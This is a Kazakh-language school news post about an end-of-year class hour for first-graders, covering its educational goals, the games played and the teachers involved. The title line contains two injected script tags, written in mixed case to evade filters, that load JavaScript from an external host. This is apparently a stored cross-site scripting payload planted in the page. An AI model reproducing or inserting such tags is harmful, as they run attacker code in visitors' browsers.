Сынып сағаты<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

28.05.2024 “Астрахан ауылының N1 ЖОББМ”КММ-нің 1”а”және 1”ә”сынып оқушыларына 2023-2024 оқу жылының аяқталуына орай “Білімім-Отаныма!” тақырыбында сынып сағаты өтті.Сынып сағаттың мақсаты: Оқушыларды қазіргі заман талабына сай терең білім алуға ынталандыру; Жас ұрпақтың танымдық көзқарасын, ой-өрісін, дүниетанымын кеңейту, іскерлік қасиеттерін дамыту; Логикалық ойлау, сөйлеу қабілеттерін шыңдау, оқушылар бойына ұлттық мәдени құндылықтарды сіңіру.Мемлекеттік тілімізді сүйе білуге үйрету, туған елін, жерін құрметтейтін саналы, ізденімпаз болуға тәрбиелеу.Оқушылар топқа бөлініп,”Бәйге “ ,”Мақалдың жалғасын жалғастыру” әдістерін қолданып,ойындар жүргізілді.Ойын барысында оқушылар оқу жылы бойы алған білімдерін жүйелі пайдалана алды.Сынып сағатын ер балалардың орындауындағы“Туған өлкем”әнімен аяқтады. Сынып жетекшілері Казанбаева А.А, Д.К.Касымова
Просмотров: 211


Пікір қосу



Деректерді қолтаңбаға қосу